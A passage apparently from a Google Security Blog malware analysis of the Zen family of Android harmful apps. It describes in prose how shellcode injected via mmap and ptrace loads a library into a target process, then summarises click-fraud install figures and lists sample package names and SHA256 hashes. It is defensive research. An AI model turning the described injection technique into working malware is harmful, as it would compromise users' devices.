  6. The source process writes the native shellcode into the memory region allocated by mmap. Additionally, it also writes addresses of dlopen, dlsym, and dlclose into the same region, so that they can be used by the shellcode. Shellcode simply uses dlopen to open a .so file within the target process and then dlsym to find a symbol in that file and run it.
  7. The source process changes the registers in the target process so that PC register points directly to the shellcode. This is done using the ptrace syscall.
This diagram illustrates the whole process.

SummaryPHA authors go to great lengths to come up with increasingly clever ways to monetize their apps.
Zen family PHA authors exhibit a wide range of techniques, from simply inserting an advertising SDK to a sophisticated trojan. The app that resulted in the largest number of affected users was the click fraud version, which was installed over 170,000 times at its peak in February 2018. The most affected countries were India, Brazil, and Indonesia. In most cases, these click fraud apps were uninstalled by the users, probably due to the low quality of the apps.
If Google Play Protect detects one of these apps, Google Play Protect will show a warning to users.
We are constantly on the lookout for new threats and we are expanding our protections. Every device with Google Play includes Google Play Protect and all apps on Google Play are automatically and periodically scanned by our solutions.
You can check the status of Google Play Protect on your device:
  1. Open your Android device's Google Play Store app.
  2. Tap Menu>Play Protect.
  3. Look for information about the status of your device.

Hashes of samples Type Package name SHA256 digest Custom ads com.targetshoot.zombieapocalypse.sniper.zombieshootinggame 5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d440307c63c6c928 Click fraud com.counterterrorist.cs.elite.combat.shootinggame 84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5b2cefac6d04 Rooting trojan com.android.world.news bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327ff4580ae213 Zen trojan com.lmt.register eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a0951370476d8d
Categories: Google Security Blog